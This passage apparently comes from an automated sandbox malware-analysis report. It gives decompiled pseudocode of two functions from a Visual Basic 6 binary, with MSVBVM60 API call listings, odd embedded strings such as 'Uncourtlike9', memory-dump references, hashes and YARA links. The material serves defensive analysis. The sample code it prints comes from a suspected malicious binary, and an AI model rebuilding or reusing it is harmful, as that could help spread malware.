				char _v52;
				char _v60;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v116;
				intOrPtr* _t79;
				char* _t81;
				void* _t83;
				intOrPtr* _t84;
				void* _t85;
				char* _t88;
				char* _t89;
				void* _t92;
				intOrPtr* _t93;
				void* _t94;
				void* _t96;
				intOrPtr* _t97;
				void* _t98;
				void* _t100;
				intOrPtr* _t101;
				char* _t111;
				void* _t148;
				intOrPtr* _t151;
				intOrPtr* _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t156;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t159;
				void* _t160;
				void* _t162;
				intOrPtr _t163;
				long long* _t164;
				intOrPtr _t167;
				intOrPtr _t170;
				intOrPtr _t173;
				char* _t175;
				intOrPtr _t176;
				intOrPtr _t179;
				long long _t183;

				_t163 = _t162 - 0xc;
				 *[fs:0x0] = _t163;
				_t164 = _t163 - 0x80;
				_v16 = _t164;
				_v12 = 0x401198;
				_v8 = 0;
				_t79 = _a4;
				 *((intOrPtr*)( *_t79 + 4))(_t79, __edi, __esi, __ebx,  *[fs:0x0], 0x4013a6, _t160);
				_t81 =  &_v96;
				_v96 = 0;
				_push(_t81);
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v60 = 0;
				_v68 = 0;
				_v72 = 0;
				_v76 = 0;
				_v80 = 0;
				_v116 = 0;
				_v88 = 0x80020004;
				_v96 = 0xa;
				L0040153E();
				st0 = __fp0;
				L00401550();
				_push(0x4039e8);
				_push("rue");
				L00401532();
				L00401598();
				_push(_t81);
				L00401538();
				_t111 =  &_v76;
				L0040154A();
				if( ~(0 | _t81 != 0x0000ffff) == 0) {
					_t148 = 0x40397c;
				} else {
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v96);
					_v88 = 0x17;
					_v96 = 2;
					L0040152C();
					L00401598();
					L00401550();
					_t167 =  *0x43039c; // 0x235e9a4
					if(_t167 == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t154 =  *0x43039c; // 0x235e9a4
					_t92 =  *((intOrPtr*)( *_t154 + 0x14))(_t154,  &_v80);
					asm("fclex");
					if(_t92 >= 0) {
						_t148 = 0x40397c;
					} else {
						_push(0x14);
						_t148 = 0x40397c;
						_push(0x40397c);
						_push(_t154);
						_push(_t92);
						L0040158C();
					}
					_t93 = _v80;
					_t155 = _t93;
					_t94 =  *((intOrPtr*)( *_t93 + 0xf8))(_t93,  &_v76);
					asm("fclex");
					if(_t94 < 0) {
						_push(0xf8);
						_push(0x40399c);
						_push(_t155);
						_push(_t94);
						L0040158C();
					}
					_v76 = 0;
					L00401598();
					L00401586();
					_t170 =  *0x43039c; // 0x235e9a4
					if(_t170 == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t156 =  *0x43039c; // 0x235e9a4
					_t96 =  *((intOrPtr*)( *_t156 + 0x14))(_t156,  &_v80);
					asm("fclex");
					if(_t96 < 0) {
						_push(0x14);
						_push(_t148);
						_push(_t156);
						_push(_t96);
						L0040158C();
					}
					_t97 = _v80;
					_t157 = _t97;
					_t98 =  *((intOrPtr*)( *_t97 + 0x58))(_t97,  &_v76);
					asm("fclex");
					if(_t98 < 0) {
						_push(0x58);
						_push(0x40399c);
						_push(_t157);
						_push(_t98);
						L0040158C();
					}
					_v76 = 0;
					L00401598();
					L00401586();
					_t173 =  *0x43039c; // 0x235e9a4
					if(_t173 == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t158 =  *0x43039c; // 0x235e9a4
					_t100 =  *((intOrPtr*)( *_t158 + 0x4c))(_t158,  &_v80);
					asm("fclex");
					if(_t100 < 0) {
						_push(0x4c);
						_push(_t148);
						_push(_t158);
						_push(_t100);
						L0040158C();
					}
					_t101 = _v80;
					_t159 = _t101;
					_t81 =  *((intOrPtr*)( *_t101 + 0x24))(_t101, L"Topscorere", "TRK",  &_v76);
					asm("fclex");
					_t175 = _t81;
					if(_t175 < 0) {
						_push(0x24);
						_push(0x403a20);
						_push(_t159);
						_push(_t81);
						L0040158C();
					}
					_v76 = 0;
					L00401598();
					_t111 =  &_v80;
					L00401586();
				}
				_push(_t111);
				_push(_t111);
				 *_t164 =  *0x401190;
				_push(_t111);
				_t183 =  *0x401190;
				_push(_t111);
				 *_t164 = _t183;
				_push(_t111);
				asm("fldz");
				_push(_t111);
				 *_t164 = _t183;
				L00401520();
				L00401526();
				asm("fcomp qword [0x401188]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t175 != 0) {
					L0040151A();
					_t176 =  *0x43039c; // 0x235e9a4
					if(_t176 == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t151 =  *0x43039c; // 0x235e9a4
					_t83 =  *((intOrPtr*)( *_t151 + 0x14))(_t151,  &_v80);
					asm("fclex");
					if(_t83 < 0) {
						_push(0x14);
						_push(_t148);
						_push(_t151);
						_push(_t83);
						L0040158C();
					}
					_t84 = _v80;
					_t152 = _t84;
					_t85 =  *((intOrPtr*)( *_t84 + 0xc8))(_t84,  &_v116);
					asm("fclex");
					if(_t85 < 0) {
						_push(0xc8);
						_push(0x40399c);
						_push(_t152);
						_push(_t85);
						L0040158C();
					}
					L00401586();
					_push( &_v96);
					L00401514();
					_push( &_v96);
					L0040156E();
					L00401598();
					L00401550();
					_t179 =  *0x43039c; // 0x235e9a4
					if(_t179 == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t153 =  *0x43039c; // 0x235e9a4
					_t88 =  &_v40;
					L00401508();
					_t89 =  &_v80;
					L0040150E();
					_t81 =  *((intOrPtr*)( *_t153 + 0x10))(_t153, _t89, _t89, _t88, _t88);
					asm("fclex");
					if(_t81 < 0) {
						_push(0x10);
						_push(_t148);
						_push(_t153);
						_push(_t81);
						L0040158C();
					}
					L00401586();
				}
				_v60 = 0xe58c8;
				asm("wait");
				_push(0x42cb72);
				L00401550();
				L0040154A();
				L0040154A();
				L0040154A();
				L0040154A();
				L0040154A();
				return _t81;
			}

0x0042c7a8
0x0042c7b7
0x0042c7be
0x0042c7c7
0x0042c7ca
0x0042c7d3
0x0042c7d6
0x0042c7dc
0x0042c7df
0x0042c7e2
0x0042c7e5
0x0042c7e6
0x0042c7e9
0x0042c7ec
0x0042c7ef
0x0042c7f2
0x0042c7f5
0x0042c7f8
0x0042c7fb
0x0042c7fe
0x0042c801
0x0042c804
0x0042c80b
0x0042c812
0x0042c817
0x0042c81c
0x0042c821
0x0042c826
0x0042c82b
0x0042c835
0x0042c83a
0x0042c83b
0x0042c84e
0x0042c851
0x0042c859
0x0042c9fe
0x0042c85f
0x0042c85f
0x0042c861
0x0042c863
0x0042c865
0x0042c86a
0x0042c86b
0x0042c872
0x0042c879
0x0042c883
0x0042c88b
0x0042c890
0x0042c896
0x0042c898
0x0042c89d
0x0042c8a2
0x0042c8a2
0x0042c8a7
0x0042c8b4
0x0042c8b7
0x0042c8bb
0x0042c8ce
0x0042c8bd
0x0042c8bd
0x0042c8bf
0x0042c8c4
0x0042c8c5
0x0042c8c6
0x0042c8c7
0x0042c8c7
0x0042c8d3
0x0042c8dd
0x0042c8df
0x0042c8e5
0x0042c8e9
0x0042c8eb
0x0042c8f0
0x0042c8f5
0x0042c8f6
0x0042c8f7
0x0042c8f7
0x0042c902
0x0042c905
0x0042c90d
0x0042c912
0x0042c918
0x0042c91a
0x0042c91f
0x0042c924
0x0042c924
0x0042c929
0x0042c936
0x0042c939
0x0042c93d
0x0042c93f
0x0042c941
0x0042c942
0x0042c943
0x0042c944
0x0042c944
0x0042c949
0x0042c953
0x0042c955
0x0042c958
0x0042c95c
0x0042c95e
0x0042c960
0x0042c965
0x0042c966
0x0042c967
0x0042c967
0x0042c972
0x0042c975
0x0042c97d
0x0042c982
0x0042c988
0x0042c98a
0x0042c98f
0x0042c994
0x0042c994
0x0042c999
0x0042c9a6
0x0042c9a9
0x0042c9ad
0x0042c9af
0x0042c9b1
0x0042c9b2
0x0042c9b3
0x0042c9b4
0x0042c9b4
0x0042c9b9
0x0042c9cd
0x0042c9cf
0x0042c9d2
0x0042c9d4
0x0042c9d6
0x0042c9d8
0x0042c9da
0x0042c9df
0x0042c9e0
0x0042c9e1
0x0042c9e1
0x0042c9ec
0x0042c9ef
0x0042c9f4
0x0042c9f7
0x0042c9f7
0x0042ca09
0x0042ca0a
0x0042ca0b
0x0042ca0e
0x0042ca0f
0x0042ca15
0x0042ca16
0x0042ca19
0x0042ca1a
0x0042ca1c
0x0042ca1d
0x0042ca20
0x0042ca25
0x0042ca2a
0x0042ca30
0x0042ca32
0x0042ca33
0x0042ca39
0x0042ca3e
0x0042ca44
0x0042ca46
0x0042ca4b
0x0042ca50
0x0042ca50
0x0042ca55
0x0042ca62
0x0042ca65
0x0042ca69
0x0042ca6b
0x0042ca6d
0x0042ca6e
0x0042ca6f
0x0042ca70
0x0042ca70
0x0042ca75
0x0042ca7f
0x0042ca81
0x0042ca87
0x0042ca8b
0x0042ca8d
0x0042ca92
0x0042ca97
0x0042ca98
0x0042ca99
0x0042ca99
0x0042caa1
0x0042caa9
0x0042caaa
0x0042cab2
0x0042cab3
0x0042cabd
0x0042cac5
0x0042caca
0x0042cad0
0x0042cad2
0x0042cad7
0x0042cadc
0x0042cadc
0x0042cae1
0x0042cae9
0x0042caed
0x0042caf3
0x0042caf7
0x0042cafe
0x0042cb01
0x0042cb05
0x0042cb07
0x0042cb09
0x0042cb0a
0x0042cb0b
0x0042cb0c
0x0042cb0c
0x0042cb14
0x0042cb14
0x0042cb19
0x0042cb20
0x0042cb21
0x0042cb44
0x0042cb4c
0x0042cb54
0x0042cb5c
0x0042cb64
0x0042cb6c
0x0042cb71

APIs

#593.MSVBVM60(?), ref: 0042C812
__vbaFreeVar.MSVBVM60(?), ref: 0042C81C
__vbaStrCat.MSVBVM60(rue,004039E8,?), ref: 0042C82B
__vbaStrMove.MSVBVM60(rue,004039E8,?), ref: 0042C835
__vbaBoolStr.MSVBVM60(00000000,rue,004039E8,?), ref: 0042C83B
__vbaFreeStr.MSVBVM60(00000000,rue,004039E8,?), ref: 0042C851
#702.MSVBVM60(0000000A,000000FF,000000FE,000000FE,000000FE,00000000,rue,004039E8,?), ref: 0042C879
__vbaStrMove.MSVBVM60(0000000A,000000FF,000000FE,000000FE,000000FE,00000000,rue,004039E8,?), ref: 0042C883
__vbaFreeVar.MSVBVM60(0000000A,000000FF,000000FE,000000FE,000000FE,00000000,rue,004039E8,?), ref: 0042C88B
__vbaNew2.MSVBVM60(0040398C,0043039C,0000000A,000000FF,000000FE,000000FE,000000FE,00000000,rue,004039E8,?), ref: 0042C8A2
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,00000014), ref: 0042C8C7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042C8F7
__vbaStrMove.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042C905
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042C90D
__vbaNew2.MSVBVM60(0040398C,0043039C), ref: 0042C924
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,00000014), ref: 0042C944
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,00000058), ref: 0042C967
__vbaStrMove.MSVBVM60(00000000,?,0040399C,00000058), ref: 0042C975
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,00000058), ref: 0042C97D
__vbaNew2.MSVBVM60(0040398C,0043039C), ref: 0042C994
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,0000004C), ref: 0042C9B4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403A20,00000024), ref: 0042C9E1
__vbaStrMove.MSVBVM60(00000000,?,00403A20,00000024), ref: 0042C9EF
__vbaFreeObj.MSVBVM60(00000000,?,00403A20,00000024), ref: 0042C9F7
#671.MSVBVM60(?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CA20
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CA25
#598.MSVBVM60(?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CA39
__vbaNew2.MSVBVM60(0040398C,0043039C,?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CA50
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,00000014,?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CA70
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,000000C8,?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CA99
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CAA1
#612.MSVBVM60(0000000A,?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CAAA
__vbaStrVarMove.MSVBVM60(0000000A,0000000A,?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CAB3
__vbaStrMove.MSVBVM60(0000000A,0000000A,?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CABD
__vbaFreeVar.MSVBVM60(0000000A,0000000A,?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CAC5
__vbaNew2.MSVBVM60(0040398C,0043039C,0000000A,0000000A,?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CADC
__vbaObjVar.MSVBVM60(?,0000000A,0000000A,?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CAED
__vbaObjSetAddref.MSVBVM60(?,00000000,?,0000000A,0000000A,?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CAF7
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,00000010,?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CB0C
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CB14
__vbaFreeVar.MSVBVM60(0042CB72,?,?,?,?,?,?,00000000,rue,004039E8,?), ref: 0042CB44

Strings

rue, xrefs: 0042C826
TRK, xrefs: 0042C9C2
Topscorere, xrefs: 0042C9C7

Memory Dump Source

Source File: 00000001.00000002.1300993047.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1300947769.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1301772553.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1301841364.0000000000432000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1302501500.0000000000473000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$New2$#593#598#612#671#702AddrefBool
String ID: TRK$Topscorere$rue
API String ID: 3888035053-3396922433
Opcode ID: 0f49ca82971a7f0661ad9f2a887c72fae6437f97ab915eacf49d6f9dddc89ad6
Instruction ID: 1ab27781530c608b6d9b5123c81289e917c8808b0af9f13a988c78915457d2ed
Opcode Fuzzy Hash: 0f49ca82971a7f0661ad9f2a887c72fae6437f97ab915eacf49d6f9dddc89ad6
Instruction Fuzzy Hash: 64B151B1D00118BBCB14EFA5DC86E9EBB78AF48308F50453EF516BB1E1DA785905CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0042C3C4, Relevance: 70.3, APIs: 39, Strings: 1, Instructions: 304
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0042C3C4(void* __ebx, void* __edi, void* __esi, void* _a40, void* _a44) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				char _v76;
				void* _v80;
				signed int _v84;
				signed int _v92;
				char _v100;
				signed int _v108;
				char _v116;
				signed int _v124;
				char _v132;
				signed int _v140;
				signed int _v148;
				void* _t95;
				intOrPtr* _t96;
				void* _t97;
				void* _t99;
				intOrPtr* _t100;
				void* _t101;
				void* _t103;
				intOrPtr* _t104;
				void* _t105;
				void* _t118;
				intOrPtr* _t119;
				void* _t120;
				void* _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				char* _t147;
				void* _t162;
				intOrPtr* _t167;
				intOrPtr* _t168;
				intOrPtr* _t169;
				intOrPtr* _t170;
				intOrPtr* _t171;
				intOrPtr* _t172;
				char _t173;
				void* _t178;
				intOrPtr _t179;
				intOrPtr _t180;
				long long* _t181;
				void* _t185;
				void* _t189;
				void* _t192;
				void* _t196;
				long long _t199;

				_t179 = _t178 - 0x10;
				_push(0x4013a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t179;
				_t180 = _t179 - 0xc0;
				_v20 = _t180;
				_v16 = 0x401178;
				_t123 = 0;
				_v12 = 0;
				_v8 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v60 = 0;
				_v64 = 0;
				_v68 = 0;
				_v72 = 0;
				_v76 = 0;
				_v80 = 0;
				_v84 = 0;
				_v100 = 0;
				_v116 = 0;
				_v132 = 0;
				_v148 = 0;
				L0040159E();
				L0040159E();
				_t185 =  *0x43039c - _t123; // 0x235e9a4
				if(_t185 == 0) {
					_push(0x43039c);
					_push(0x40398c);
					L00401592();
				}
				_t167 =  *0x43039c; // 0x235e9a4
				_t95 =  *((intOrPtr*)( *_t167 + 0x14))(_t167,  &_v80);
				asm("fclex");
				if(_t95 < _t123) {
					_push(0x14);
					_push(0x40397c);
					_push(_t167);
					_push(_t95);
					L0040158C();
				}
				_t96 = _v80;
				_t168 = _t96;
				_t97 =  *((intOrPtr*)( *_t96 + 0xf8))(_t96,  &_v76);
				asm("fclex");
				if(_t97 < _t123) {
					_push(0xf8);
					_push(0x40399c);
					_push(_t168);
					_push(_t97);
					L0040158C();
				}
				_v76 = _t123;
				L00401598();
				L00401586();
				L00401580();
				L00401598();
				_push(_t123);
				L0040157A();
				_push(0x4039b0);
				L00401574();
				_t162 = 2;
				if(_t97 != _t162) {
					_t189 =  *0x43039c - _t123; // 0x235e9a4
					if(_t189 == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t171 =  *0x43039c; // 0x235e9a4
					_t103 =  *((intOrPtr*)( *_t171 + 0x14))(_t171,  &_v80);
					asm("fclex");
					if(_t103 < _t123) {
						_push(0x14);
						_push(0x40397c);
						_push(_t171);
						_push(_t103);
						L0040158C();
					}
					_t104 = _v80;
					_t172 = _t104;
					_t105 =  *((intOrPtr*)( *_t104 + 0x138))(_t104, L"Uncourtlike9", 1);
					asm("fclex");
					if(_t105 < _t123) {
						_push(0x138);
						_push(0x40399c);
						_push(_t172);
						_push(_t105);
						L0040158C();
					}
					L00401586();
					_v92 = _t162;
					_v100 = _t162;
					_push( &_v100);
					_push( &_v116);
					L00401568();
					_push( &_v116);
					L0040156E();
					_t147 =  &_v32;
					L00401598();
					_push( &_v116);
					_push( &_v100);
					_push(_t162);
					L00401562();
					_t181 = _t180 + 0xc;
					_v124 = 0x80020004;
					_t173 = 0xa;
					_v132 = _t173;
					_v108 = 0x80020004;
					_v116 = _t173;
					_v92 = 0x80020004;
					_v100 = _t173;
					_push( &_v132);
					_push( &_v116);
					_push( &_v100);
					_t199 =  *0x401170;
					_push(_t147);
					_push(_t147);
					 *_t181 = _t199;
					asm("fld1");
					_push(_t147);
					_push(_t147);
					 *_t181 = _t199;
					asm("fld1");
					_push(_t147);
					_push(_t147);
					 *_t181 = _t199;
					L0040155C();
					st0 = _t199;
					_push( &_v132);
					_push( &_v116);
					_push( &_v100);
					_push(3);
					L00401562();
					_t192 =  *0x43039c - _t123; // 0x235e9a4
					if(_t192 == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t124 =  *0x43039c; // 0x235e9a4
					_t118 =  *((intOrPtr*)( *_t124 + 0x1c))(_t124,  &_v80);
					asm("fclex");
					if(_t118 < 0) {
						_push(0x1c);
						_push(0x40397c);
						_push(_t124);
						_push(_t118);
						L0040158C();
					}
					_t119 = _v80;
					_t125 = _t119;
					_v140 = 0x80020004;
					_v148 = _t173;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t120 =  *((intOrPtr*)( *_t119 + 0x54))(_t119,  &_v84);
					asm("fclex");
					if(_t120 < 0) {
						_push(0x54);
						_push(0x4039d4);
						_push(_t125);
						_push(_t120);
						L0040158C();
					}
					_v84 = _v84 & 0x00000000;
					_v92 = _v84;
					_v100 = 9;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v60);
					L00401556();
					L00401586();
					L00401550();
					_t123 = 0;
				}
				_t196 =  *0x43039c - _t123; // 0x235e9a4
				if(_t196 == 0) {
					_push(0x43039c);
					_push(0x40398c);
					L00401592();
				}
				_t169 =  *0x43039c; // 0x235e9a4
				_t99 =  *((intOrPtr*)( *_t169 + 0x14))(_t169,  &_v80);
				asm("fclex");
				if(_t99 < _t123) {
					_push(0x14);
					_push(0x40397c);
					_push(_t169);
					_push(_t99);
					L0040158C();
				}
				_t100 = _v80;
				_t170 = _t100;
				_t101 =  *((intOrPtr*)( *_t100 + 0x60))(_t100,  &_v76);
				asm("fclex");
				if(_t101 < _t123) {
					_push(0x60);
					_push(0x40399c);
					_push(_t170);
					_push(_t101);
					L0040158C();
				}
				_v76 = _t123;
				L00401598();
				L00401586();
				_v56 = 0xb2782dd0;
				_v52 = 0x5b03;
				asm("wait");
				_push(0x42c784);
				L0040154A();
				L0040154A();
				L0040154A();
				L00401586();
				L0040154A();
				L0040154A();
				L0040154A();
				return _t101;
			}

0x0042c3c7
0x0042c3ca
0x0042c3d5
0x0042c3d6
0x0042c3dd
0x0042c3e6
0x0042c3e9
0x0042c3f0
0x0042c3f2
0x0042c3f5
0x0042c3f8
0x0042c3fb
0x0042c3fe
0x0042c401
0x0042c404
0x0042c407
0x0042c40a
0x0042c40d
0x0042c410
0x0042c413
0x0042c416
0x0042c419
0x0042c41c
0x0042c41f
0x0042c42b
0x0042c436
0x0042c43b
0x0042c441
0x0042c443
0x0042c448
0x0042c44d
0x0042c44d
0x0042c452
0x0042c45f
0x0042c462
0x0042c466
0x0042c468
0x0042c46a
0x0042c46f
0x0042c470
0x0042c471
0x0042c471
0x0042c476
0x0042c479
0x0042c482
0x0042c488
0x0042c48c
0x0042c48e
0x0042c493
0x0042c498
0x0042c499
0x0042c49a
0x0042c49a
0x0042c4a2
0x0042c4a8
0x0042c4b0
0x0042c4b5
0x0042c4bf
0x0042c4c4
0x0042c4c5
0x0042c4ca
0x0042c4cf
0x0042c4d6
0x0042c4d9
0x0042c4df
0x0042c4e5
0x0042c4e7
0x0042c4ec
0x0042c4f1
0x0042c4f1
0x0042c4f6
0x0042c503
0x0042c506
0x0042c50a
0x0042c50c
0x0042c50e
0x0042c513
0x0042c514
0x0042c515
0x0042c515
0x0042c51a
0x0042c51d
0x0042c529
0x0042c52f
0x0042c533
0x0042c535
0x0042c53a
0x0042c53f
0x0042c540
0x0042c541
0x0042c541
0x0042c549
0x0042c54e
0x0042c551
0x0042c557
0x0042c55b
0x0042c55c
0x0042c564
0x0042c565
0x0042c56c
0x0042c56f
0x0042c577
0x0042c57b
0x0042c57c
0x0042c57d
0x0042c582
0x0042c58a
0x0042c58f
0x0042c590
0x0042c593
0x0042c596
0x0042c599
0x0042c59c
0x0042c5a2
0x0042c5a6
0x0042c5aa
0x0042c5ab
0x0042c5b1
0x0042c5b2
0x0042c5b3
0x0042c5b6
0x0042c5b8
0x0042c5b9
0x0042c5ba
0x0042c5bd
0x0042c5bf
0x0042c5c0
0x0042c5c1
0x0042c5c4
0x0042c5c9
0x0042c5ce
0x0042c5d2
0x0042c5d6
0x0042c5d7
0x0042c5d9
0x0042c5e1
0x0042c5e7
0x0042c5e9
0x0042c5ee
0x0042c5f3
0x0042c5f3
0x0042c5f8
0x0042c605
0x0042c608
0x0042c60c
0x0042c60e
0x0042c610
0x0042c615
0x0042c616
0x0042c617
0x0042c617
0x0042c61c
0x0042c61f
0x0042c621
0x0042c627
0x0042c63e
0x0042c63f
0x0042c640
0x0042c641
0x0042c643
0x0042c646
0x0042c64a
0x0042c64c
0x0042c64e
0x0042c653
0x0042c654
0x0042c655
0x0042c655
0x0042c65d
0x0042c661
0x0042c664
0x0042c673
0x0042c674
0x0042c675
0x0042c676
0x0042c677
0x0042c679
0x0042c67c
0x0042c684
0x0042c68c
0x0042c691
0x0042c691
0x0042c693
0x0042c699
0x0042c69b
0x0042c6a0
0x0042c6a5
0x0042c6a5
0x0042c6aa
0x0042c6b7
0x0042c6ba
0x0042c6be
0x0042c6c0
0x0042c6c2
0x0042c6c7
0x0042c6c8
0x0042c6c9
0x0042c6c9
0x0042c6ce
0x0042c6d1
0x0042c6da
0x0042c6dd
0x0042c6e1
0x0042c6e3
0x0042c6e5
0x0042c6ea
0x0042c6eb
0x0042c6ec
0x0042c6ec
0x0042c6f4
0x0042c6fa
0x0042c702
0x0042c707
0x0042c70e
0x0042c715
0x0042c716
0x0042c74e
0x0042c756
0x0042c75e
0x0042c766
0x0042c76e
0x0042c776
0x0042c77e
0x0042c783

APIs

__vbaStrCopy.MSVBVM60 ref: 0042C42B
__vbaStrCopy.MSVBVM60 ref: 0042C436
__vbaNew2.MSVBVM60(0040398C,0043039C), ref: 0042C44D
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,00000014), ref: 0042C471
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042C49A
__vbaStrMove.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042C4A8
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042C4B0
#611.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042C4B5
__vbaStrMove.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042C4BF
__vbaOnError.MSVBVM60(00000000), ref: 0042C4C5
__vbaI4Str.MSVBVM60(004039B0,00000000), ref: 0042C4CF
__vbaNew2.MSVBVM60(0040398C,0043039C,004039B0,00000000), ref: 0042C4F1
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,00000014), ref: 0042C515
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,00000138), ref: 0042C541
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,00000138), ref: 0042C549
#613.MSVBVM60(?,?), ref: 0042C55C
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0042C565
__vbaStrMove.MSVBVM60(?,?,?), ref: 0042C56F
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0042C57D
#680.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0042C5C4
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C5D9
__vbaNew2.MSVBVM60(0040398C,0043039C,?,?,?,?), ref: 0042C5F3
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,0000001C,?,?,?,?), ref: 0042C617
__vbaHresultCheckObj.MSVBVM60(00000000,?,004039D4,00000054,?,?,?,?,?,?,?,?), ref: 0042C655
__vbaLateIdSt.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C67C
__vbaFreeObj.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C684
__vbaFreeVar.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C68C
__vbaNew2.MSVBVM60(0040398C,0043039C,004039B0,00000000), ref: 0042C6A5
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,00000014), ref: 0042C6C9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,00000060), ref: 0042C6EC
__vbaStrMove.MSVBVM60(00000000,?,0040399C,00000060), ref: 0042C6FA
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,00000060), ref: 0042C702
__vbaFreeStr.MSVBVM60(0042C784), ref: 0042C74E
__vbaFreeStr.MSVBVM60(0042C784), ref: 0042C756
__vbaFreeStr.MSVBVM60(0042C784), ref: 0042C75E
__vbaFreeObj.MSVBVM60(0042C784), ref: 0042C766
__vbaFreeStr.MSVBVM60(0042C784), ref: 0042C76E
__vbaFreeStr.MSVBVM60(0042C784), ref: 0042C776
__vbaFreeStr.MSVBVM60(0042C784), ref: 0042C77E

Strings

Uncourtlike9, xrefs: 0042C523

Memory Dump Source

Source File: 00000001.00000002.1300993047.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1300947769.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1301772553.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1301841364.0000000000432000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1302501500.0000000000473000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$New2$CopyList$#611#613#680ErrorLate
String ID: Uncourtlike9
API String ID: 537582759-1924179844
Opcode ID: d5a18c9bcdca556430c448d4effe9728d11c42a747787068d2e78fcdef173869
Instruction ID: 2a9fc28456854ac6a3d4ceec8942a6ba883c861bbc18af3fc0692c5bc24ba7d6
Opcode Fuzzy Hash: d5a18c9bcdca556430c448d4effe9728d11c42a747787068d2e78fcdef173869
Instruction Fuzzy Hash: 93B10FB1D40218ABCB10EFA5CC86EEEBBB8BF54704F50452EF506BB191DB7859058F58

Uniqueness

Uniqueness Score: -1.00%

